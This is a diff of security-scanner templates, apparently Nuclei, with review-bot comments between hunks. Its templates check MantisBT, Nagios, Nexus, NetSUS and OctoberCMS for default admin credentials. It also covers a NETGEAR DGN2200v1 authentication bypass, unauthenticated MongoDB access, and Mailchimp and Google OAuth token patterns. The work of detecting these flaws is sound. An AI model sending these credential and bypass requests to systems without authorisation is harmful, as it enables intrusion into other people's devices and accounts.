"{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word diff --git a/poc/auth/mailchimp-api-key-8722.yaml b/poc/auth/mailchimp-api-key-8722.yaml index fb0d8ec4c2..14819b8241 100644 
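Review bot: The `lutron-iot-default-login.yaml` hunk removes the `tags:` line and adds none back, so the template is left untagged and is skipped by any scan that selects templates by tag (`default-login`, `iot`). The sibling `lutron-iot-default-login-8676.yaml` in this same commit gains exactly that line, `tags: iot,default-login,lutron,panel`, and it should be kept here too. The `mailchimp-api-key-8722.yaml` hunk further down has the same defect: it drops `tags: exposure,token,mailchimp` without a replacement.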
--- a/poc/auth/mailchimp-api-key-8722.yaml +++ b/poc/auth/mailchimp-api-key-8722.yaml @@ -1,22 +1,20 @@ id: mailchimp-access-key-value - info: name: Mailchimp API Value author: puzzlepeaches - severity: info - metadata: - max-request: 1 - tags: exposure,token,mailchimp - -http: + severity: medium +requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" extractors: - type: regex part: body regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a0047304502207e0ab7518b414240980df385f972649a53d23d4cbdd9541a4b521a4785fd5f34022100d07a1f2d85bf26f3a817e8ccca7af3b238d06d93be9c3da1020682d0170d7fc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/mailchimp-api-key-8726.yaml b/poc/auth/mailchimp-api-key-8726.yaml deleted file mode 100644 index 14819b8241..0000000000 --- a/poc/auth/mailchimp-api-key-8726.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: mailchimp-access-key-value -info: - name: Mailchimp API Value - author: puzzlepeaches - severity: medium -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" - extractors: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/auth/mantisbt-default-credential-8778.yaml b/poc/auth/mantisbt-default-credential-8778.yaml index 329e2e16cb..4ffeb88644 100644 --- a/poc/auth/mantisbt-default-credential-8778.yaml +++ b/poc/auth/mantisbt-default-credential-8778.yaml 
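Review bot: The regex `[0-9a-f]{32}-us[0-9]{1,2}`, now used as both matcher and extractor in `mailchimp-api-key-8722.yaml`, is unanchored, so it also matches inside longer hex strings or identifiers. The hunk raises the finding to `severity: medium` on that pattern alone. Word boundaries would reduce the false positives: `- '\b[0-9a-f]{32}-us[0-9]{1,2}\b'`, in single quotes because `\b` in a double-quoted YAML string is a backspace. `matchers-condition: and` over a single matcher is redundant and can be dropped.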
@@ -2,52 +2,45 @@ id: mantisbt-default-credential info: name: MantisBT Default Admin Login - author: YashVardhanTripathi + author: For3stCo1d severity: high - description: A MantisBT default admin login dsicovery template. - -http: - - method: GET - path: - - "{{BaseURL}}/mantis/login_page.php" - - redirects: true - - extractors: - - type: regex - name: somesome - group: 1 - part: header - regex: - - "PHPSESSID=([a-zA-Z0-9]+);" + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mantisbt,default-login +requests: - raw: - | - POST /mantis/login_password_page.php HTTP/1.1 + POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: MANTIS_secure_session=1; PHPSESSID={{somesome}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate, br - Connection: close - Upgrade-Insecure-Requests: 1 - return=index.php&username={{pewpew}}&password={{password}}&secure_session=on + return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: - pewpew: + user: - administrator - password: + pass: - root - attack: pitchfork + matchers-condition: and matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + - type: status status: - 302 - - type: regex - part: header - regex: - - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + +# Enhanced by mp on 2022/03/22 
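Review bot: The rewritten raw request posts to the fixed path `/login.php`, whereas the removed version targeted `/mantis/...`, so an instance installed under a sub-directory is silently not covered and the scan reports it as clean. Either add a second raw entry for the `/mantis/login.php` location or state in `description` that only installs at the web root are checked. The new `dsl` matcher relies on `mantis_string_cookie` being set only after a successful login; that cannot be confirmed from this hunk and deserves a one-line comment above the matcher. A `remediation:` line telling the operator to change the administrator password would complete the added metadata.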
diff --git a/poc/auth/meshcentral-login-8801.yaml b/poc/auth/meshcentral-login-8801.yaml deleted file mode 100644 index 7f06f95f8e..0000000000 --- a/poc/auth/meshcentral-login-8801.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: meshcentral-login -info: - name: MeshCentral - Login - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'http.title:"MeshCentral - Login"' - tags: panel,meshcentral -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "MeshCentral - Login" - - type: status - status: - - 200 diff --git a/poc/auth/meshcentral-login-8803.yaml b/poc/auth/meshcentral-login-8803.yaml new file mode 100644 index 0000000000..32556ae3e5 --- /dev/null +++ b/poc/auth/meshcentral-login-8803.yaml @@ -0,0 +1,21 @@ +id: meshcentral-login +info: + name: MeshCentral - Login + author: dhiyaneshDk + severity: info + metadata: + shodan-query: http.title:"MeshCentral - Login" + tags: panel,meshcentral +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MeshCentral - Login" + - type: status + status: + - 200 diff --git a/poc/auth/mongodb-unauth-8925.yaml b/poc/auth/mongodb-unauth-8925.yaml deleted file mode 100644 index 904fcb4355..0000000000 --- a/poc/auth/mongodb-unauth-8925.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: mongodb-unauth - -info: - name: Unauth MongoDB Disclosure - author: pdteam - severity: high - reference: https://github.com/orleven/Tentacle - tags: network,mongodb,unauth - -network: - - inputs: - - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 - type: hex - - host: - - "{{Hostname}}" - - "{{Host}}:27017" - read-size: 2048 - matchers: - - type: word - words: - - "totalLinesWritten" 
diff --git a/poc/auth/mongodb-unauth-8928.yaml b/poc/auth/mongodb-unauth-8928.yaml index 96c39c9b0a..95c8e16782 100644 --- a/poc/auth/mongodb-unauth-8928.yaml +++ b/poc/auth/mongodb-unauth-8928.yaml @@ -1,26 +1,19 @@ id: mongodb-unauth info: - name: MongoDB - Unauthenticated Access + name: Unauth MongoDB Disclosure author: pdteam severity: high - description: MongoDB was able to be accessed with no password. Note that MongoDB does not require a password by default. - reference: - - https://github.com/orleven/Tentacle - - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB - tags: network,mongodb,unauth + reference: https://github.com/orleven/Tentacle + tags: network,mongodb network: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 type: hex host: - "{{Hostname}}" - - "{{Host}}:27017" + - "{{Hostname}}:27017" read-size: 2048 matchers: - type: word words: - "totalLinesWritten" - -# Enhanced by mp on 2022/07/20 diff --git a/poc/auth/mysql-native-password-8981.yaml b/poc/auth/mysql-native-password-8981.yaml index 2f6a91ddb9..86607cd0ec 100644 --- a/poc/auth/mysql-native-password-8981.yaml +++ b/poc/auth/mysql-native-password-8981.yaml @@ -1,17 +1,14 @@ id: mysql-native-password - info: name: MySQL DB with enabled native password author: iamthefrogy severity: info - description: MySQL instance with enabled native password support is prone to password brute-force attacks. tags: network,mysql,bruteforce,db - + description: MySQL instance with enabled native password support is prone to password brute-force attacks. network: - host: - "{{Hostname}}" - "{{Host}}:3306" - matchers: - type: word words: diff --git a/poc/auth/mysql-native-password.yaml b/poc/auth/mysql-native-password.yaml index 86607cd0ec..ba4b0a61fb 100644 
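Review bot: In the hunk for poc/auth/mongodb-unauth-8928.yaml the second host entry changes from `{{Host}}:27017` to `{{Hostname}}:27017`; `{{Hostname}}` already includes the port when the target specifies one, so this can expand to `host:port:27017` and the fallback probe of the default port fails. Restore `- "{{Host}}:27017"`. The same hunk removes the `description`, the `remediation: Enable Authentication in MongoDB` line and the `unauth` tag, which are what the person triaging a finding needs; they should stay.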
--- a/poc/auth/mysql-native-password.yaml +++ b/poc/auth/mysql-native-password.yaml @@ -1,15 +1,26 @@ id: mysql-native-password + info: - name: MySQL DB with enabled native password + name: MySQL - Password Vulnerability author: iamthefrogy severity: info - tags: network,mysql,bruteforce,db - description: MySQL instance with enabled native password support is prone to password brute-force attacks. -network: + description: MySQL database queries with enabled native password support are susceptible to password brute-force attacks. + reference: + - https://github.com/Tinram/MySQL-Brute + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: network,mysql,bruteforce,db,misconfig + +tcp: - host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 + matchers: - type: word words: - "mysql_native_password" +# digest: 490a00463044022044732766bfbc5d532a502fe7223dd1d30be97a75773e7381615d68dab21a5f7e022004498362c35d63c1b8712520d0754e9c825be442a44c5cd9e3bd1c605f00e387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/nagios-default-login-8990.yaml b/poc/auth/nagios-default-login-8990.yaml new file mode 100644 index 0000000000..9b4cbecca4 --- /dev/null +++ b/poc/auth/nagios-default-login-8990.yaml 
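Review bot: The new `name: MySQL - Password Vulnerability` and the reworded description claim more than the template checks: the only matcher looks for the word `mysql_native_password` in what the server sends on connect, i.e. which authentication plugin is advertised. The added CVSS vector (all impacts `N`) and `severity: info` describe a detection, so the name should as well, e.g. `name: MySQL - Native Password Authentication Enabled`. The phrase "MySQL database queries with enabled native password support" is also garbled; "MySQL instance with native password authentication enabled" says what is meant. The file now ends without a trailing newline after the digest comment.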
@@ -0,0 +1,44 @@ +id: nagios-default-login + +info: + name: Nagios Default Login + author: iamthefrogy + description: Nagios default admin credentials were discovered. + severity: high + tags: nagios,default-login + reference: https://www.nagios.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + GET /nagios/side.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - nagiosadmin + - root + password: + - nagiosadmin + - nagiosxi + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Current Status' + - 'Reports' + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/nagios-default-login-8994.yaml b/poc/auth/nagios-default-login-8994.yaml deleted file mode 100644 index e1982ba865..0000000000 --- a/poc/auth/nagios-default-login-8994.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: nagios-default-login -info: - name: Nagios Default Login - author: d3sca - severity: high - tags: nagios,default-login - reference: https://www.nagios.org -requests: - - raw: - - | - GET /nagios/side.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - nagiosadmin - - root - password: - - nagiosadmin - - nagiosxi - attack: pitchfork - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'Current Status' - - 'Reports' - condition: and diff --git a/poc/auth/netgear-router-auth-bypass-9025.yaml b/poc/auth/netgear-router-auth-bypass-9025.yaml deleted file mode 100644 index 930b6cb68f..0000000000 --- a/poc/auth/netgear-router-auth-bypass-9025.yaml +++ /dev/null 
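Review bot: The matchers in poc/auth/nagios-default-login-8990.yaml (status 200 plus the words `Current Status` and `Reports`) are satisfied by any response that serves `/nagios/side.php`, so an instance whose web interface is reachable without HTTP authentication would presumably be reported as using default credentials, once per payload pair. A preceding request without the `Authorization` header that is required to return 401 would separate the two cases and make the finding trustworthy. The `classification` block also carries an empty `cve-id:` key; drop that line rather than emit a null value.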
@@ -1,28 +0,0 @@
-id: netgear-router-auth-bypass
-info:
- name: NETGEAR DGN2200v1 Router Authentication Bypass
- author: gy741
- severity: high
- description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”).
- reference:
- - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
- tags: netgear,auth-bypass,router
-requests:
- - raw:
- - |
- GET /WAN_wan.htm?.gif HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- - |
- GET /WAN_wan.htm?.gif HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "WAN Setup"
diff --git a/poc/auth/netgear-router-auth-bypass.yaml b/poc/auth/netgear-router-auth-bypass.yaml
new file mode 100644
index 0000000000..515963c861
--- /dev/null
+++ b/poc/auth/netgear-router-auth-bypass.yaml
@@ -0,0 +1,28 @@
+id: netgear-router-auth-bypass
+info:
+ name: NETGEAR DGN2200v1 Router Authentication Bypass
+ author: gy741
+ severity: high
+ description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif").
+ reference:
+ - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
+ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
+ tags: netgear,auth-bypass,router
+requests:
+ - raw:
+ - |
+ GET /WAN_wan.htm?.gif HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ - |
+ GET /WAN_wan.htm?.gif HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "WAN Setup"
diff --git a/poc/auth/netscaler-aaa-login.yaml b/poc/auth/netscaler-aaa-login.yaml
index 441256f6a7..ea4d37bab9 100644
--- a/poc/auth/netscaler-aaa-login.yaml
+++ b/poc/auth/netscaler-aaa-login.yaml
@@ -1,16 +1,29 @@ id: netscaler-aaa-login + info: - name: NetScaler AAA Login Panel + name: NetScaler AAA Login Panel - Detect author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6898 - tags: panel,netscaler,login -requests: + description: NetScaler AAA login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6898 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,netscaler,login,edb + +http: - method: GET path: - '{{BaseURL}}/logon/LogonPoint/tmindex.html' + matchers: - type: word words: - "NetScaler AAA" condition: and + +# digest: 490a0046304402205bfa8177ee68e9094c9857093cf4887e370c5aa126c6cda8f1f9fccfdd5b2d220220597ae2c1e087305ce4f0f426c4e7b1d2ba08718d80571938424bdafb4cb3dd6f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/netsus-default-login-9060.yaml b/poc/auth/netsus-default-login-9060.yaml deleted file mode 100644 index d2d6a86e19..0000000000 --- a/poc/auth/netsus-default-login-9060.yaml +++ /dev/null 
@@ -1,46 +0,0 @@ -id: netsus-default-login - -info: - name: NetSUS Server Default Login - author: princechaddha - severity: high - description: NetSUS Server default admin credentials were discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - shodan-query: http.title:"NetSUS Server Login" - tags: netsus,default-login - -http: - - raw: - - | - POST /webadmin/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginwith=suslogin&username={{username}}&password={{password}}&submit= - - attack: pitchfork - payloads: - username: - - webadmin - password: - - webadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Location: dashboard.php' - - 'PHPSESSID=' - condition: and - - - type: status - status: - - 302 - -# digest: 4b0a00483046022100f81ef0749fcb57b49a9eee5f0d9ef75806c3f56c5940782b6063ac5c689bab70022100f300142aa6fdcb0f7e9562484cd14eb4ebb8d0efb0597c63a69b6407f6eed8b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/netsus-default-login.yaml b/poc/auth/netsus-default-login.yaml new file mode 100644 index 0000000000..adee76136b --- /dev/null +++ b/poc/auth/netsus-default-login.yaml @@ -0,0 +1,33 @@ +id: netsus-default-login +info: + name: NetSUS Server Default Login + author: princechaddha + severity: high + metadata: + shodan-query: 'http.title:"NetSUS Server Login"' + tags: netsus,default-login +requests: + - raw: + - | + POST /webadmin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginwith=suslogin&username={{username}}&password={{password}}&submit= + attack: pitchfork + payloads: + username: + - webadmin + password: + - webadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: dashboard.php' + - 'PHPSESSID=' + condition: and + - type: status + status: + - 302 
diff --git a/poc/auth/netsus-server-login-9061.yaml b/poc/auth/netsus-server-login-9061.yaml new file mode 100644 index 0000000000..8ae8adef0c --- /dev/null +++ b/poc/auth/netsus-server-login-9061.yaml @@ -0,0 +1,20 @@ +id: netsus-server-login +info: + name: NetSUS Server Login Panel + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"NetSUS Server Login"' + tags: panel,netsus,login +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/' + matchers-condition: and + matchers: + - type: word + words: + - 'NetSUS Server Login' + - type: status + status: + - 200 diff --git a/poc/auth/netsus-server-login-9062.yaml b/poc/auth/netsus-server-login-9062.yaml deleted file mode 100644 index 510cd9bae5..0000000000 --- a/poc/auth/netsus-server-login-9062.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: netsus-server-login -info: - name: NetSUS Server Login Panel - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"NetSUS Server Login" - tags: panel,netsus,login -requests: - - method: GET - path: - - '{{BaseURL}}/webadmin/' - matchers-condition: and - matchers: - - type: word - words: - - 'NetSUS Server Login' - - type: status - status: - - 200 diff --git a/poc/auth/nexus-default-login-9088.yaml b/poc/auth/nexus-default-login-9088.yaml index 3560137b42..9b769c93c0 100644 --- a/poc/auth/nexus-default-login-9088.yaml +++ b/poc/auth/nexus-default-login-9088.yaml @@ -1,5 +1,4 @@ id: nexus-default-login - info: name: Nexus Default Login author: pikpikcu @@ -9,11 +8,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: nexus,default-login - -http: +requests: - raw: - | POST /service/rapture/session HTTP/1.1 
@@ -22,20 +18,17 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{base64(username)}}&password={{base64(password)}} - payloads: username: - admin password: - admin123 attack: pitchfork - matchers-condition: and matchers: - type: status status: - 204 - - type: word words: - "Server: Nexus" @@ -43,4 +36,4 @@ http: part: header condition: and -# digest: 4b0a00483046022100c45ecf382aa007cfca38e5e787d1e06605e4f93544ee237e29ff85360421f772022100e22e8814df0f932a2b481ebca3ee6786b458639f31c7a37883b5fbc9d7e774af:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/nexus-default-login-9089.yaml b/poc/auth/nexus-default-login-9089.yaml index 52f9a00602..3560137b42 100644 --- a/poc/auth/nexus-default-login-9089.yaml +++ b/poc/auth/nexus-default-login-9089.yaml @@ -1,10 +1,19 @@ id: nexus-default-login + info: name: Nexus Default Login author: pikpikcu severity: high + description: Nexus default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 tags: nexus,default-login -requests: + +http: - raw: - | POST /service/rapture/session HTTP/1.1 @@ -13,20 +22,25 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{base64(username)}}&password={{base64(password)}} + payloads: username: - admin password: - admin123 attack: pitchfork + matchers-condition: and matchers: - type: status status: - 204 + - type: word words: - "Server: Nexus" - "NXSESSIONID" part: header condition: and + +# digest: 4b0a00483046022100c45ecf382aa007cfca38e5e787d1e06605e4f93544ee237e29ff85360421f772022100e22e8814df0f932a2b481ebca3ee6786b458639f31c7a37883b5fbc9d7e774af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nps-default-login-9145.yaml b/poc/auth/nps-default-login-9145.yaml deleted file mode 100644 index ec2e9c00fa..0000000000 
--- a/poc/auth/nps-default-login-9145.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: nps-default-login - -info: - name: NPS Default Login - author: pikpikcu - severity: high - description: NPS default admin credentials were discovered. - reference: - - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: nps,default-login - -http: - - raw: - - | - POST /login/verify HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{Hostname}}/login/index - - username={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - 123 - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - '"msg": "login success"' - - '"status": 1' - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 490a004630440220606c381c7362f49fbe0d2cd4cda89a9e4a210f0b5fd4b5d5fa2f3046f159dcce022001e59e9ab3ccf71662fdd228b0cb33a3afa348145c16b4f3a2336fe9e26c3fdb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nuuno-network-login-9164.yaml b/poc/auth/nuuno-network-login-9164.yaml new file mode 100644 index 0000000000..5cebebd091 --- /dev/null +++ b/poc/auth/nuuno-network-login-9164.yaml @@ -0,0 +1,20 @@ +id: nuuno-network-login +info: + name: NUUO Network Video Recorder Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6840 + tags: iot,panel,nuuo +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'NUUO Network Video Recorder Login' + part: body + - type: status + status: + - 200 
diff --git a/poc/auth/nuuno-network-login-9162.yaml b/poc/auth/nuuno-network-login.yaml similarity index 100% rename from poc/auth/nuuno-network-login-9162.yaml rename to poc/auth/nuuno-network-login.yaml diff --git a/poc/auth/oauth-access-key-9186.yaml b/poc/auth/oauth-access-key-9186.yaml new file mode 100644 index 0000000000..2d8fe9b31a --- /dev/null +++ b/poc/auth/oauth-access-key-9186.yaml @@ -0,0 +1,22 @@ +id: google-oauth-access-key + +info: + name: Google OAuth Access Key Disclosure + author: Ice3man + severity: info + metadata: + max-request: 1 + tags: exposure,token,google + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'ya29\.[0-9A-Za-z\-_]+' + +# digest: 4a0a0047304502204d03880d0ac100fc1b228742a40f773ee0eb8f075ce931afd868dafc63f76969022100a6b6074606cbfa0b79f133853b3fd5e4358a4675572cf02117b1a85dd99f2c8d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/oauth2-detect-9181.yaml b/poc/auth/oauth2-detect-9181.yaml deleted file mode 100644 index ba774a7a3c..0000000000 --- a/poc/auth/oauth2-detect-9181.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - metadata: - max-request: 1 - tags: tech,oauth - -http: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: - - 'error":"invalid_client"' - -# digest: 4a0a004730450221008920ab1a64cea625f9fa75cc16e79ea29a580cb37f3022bf6321140996d686b9022043339df3882017519713f41f22be4855e384f6505b79983592ada49c83ab4ea1:922c64590222798bb761d5b6d8e72950 
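Review bot: The extractor pattern `ya29\.[0-9A-Za-z\-_]+` in the new poc/auth/oauth-access-key-9186.yaml accepts a single character after the prefix, so any short `ya29.x` fragment in a page is reported as a token. Requiring a minimum length, for example `- 'ya29\.[0-9A-Za-z\-_]{20,}'` (the exact floor should be checked against real token lengths), would cut that noise. The `info` block has no `description`; one line stating that the match is pattern-only and the token is not validated would help whoever triages the result. The file name says `oauth-access-key` while the `id` is `google-oauth-access-key`, which makes the template harder to find by id.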
diff --git a/poc/auth/oauth2-detect-9182.yaml b/poc/auth/oauth2-detect-9182.yaml index fd9066a622..6d692b274c 100644 --- a/poc/auth/oauth2-detect-9182.yaml +++ b/poc/auth/oauth2-detect-9182.yaml @@ -1,28 +1,23 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: - - 'error":"invalid_client"' \ No newline at end of file +id: oauth2-detect +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + - type: word + part: body + words: + - 'error":"invalid_client"' diff --git a/poc/auth/octobercms-default-login-9192.yaml b/poc/auth/octobercms-default-login-9192.yaml deleted file mode 100644 index 480d0eb092..0000000000 --- a/poc/auth/octobercms-default-login-9192.yaml +++ /dev/null 
@@ -1,65 +0,0 @@ -id: octobercms-default-login - -info: - name: OctoberCMS - Default Admin Discovery - author: princechaddha - severity: high - description: OctoberCMS default admin credentials were discovered. - reference: - - https://github.com/octobercms/october - - https://octobercms.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - verified: true - max-request: 4 - shodan-query: http.component:"October CMS" - tags: octobercms,default-login,oss - -http: - - raw: - - | - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - _token={{token}}&postback=1&login={{username}}&password={{password}} - - attack: clusterbomb - payloads: - username: - - admin - password: - - admin - - "" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "october_session=" - - "admin_auth=" - condition: and - - - type: status - status: - - 302 - - extractors: - - type: regex - part: body - name: token - internal: true - group: 1 - regex: - - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' - -# digest: 4b0a004830460221008c9a98bee55491e7fe022bdcc030f081bf74c377b2de0061057ad20cadcb33a2022100e8ea2fb0bdee7e31aa27be618dcf8e91cfd91ae54928b37de4c70b77c43ffa89:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/octobercms-default-login.yaml b/poc/auth/octobercms-default-login.yaml new file mode 100644 index 0000000000..a6822af271 --- /dev/null +++ b/poc/auth/octobercms-default-login.yaml 
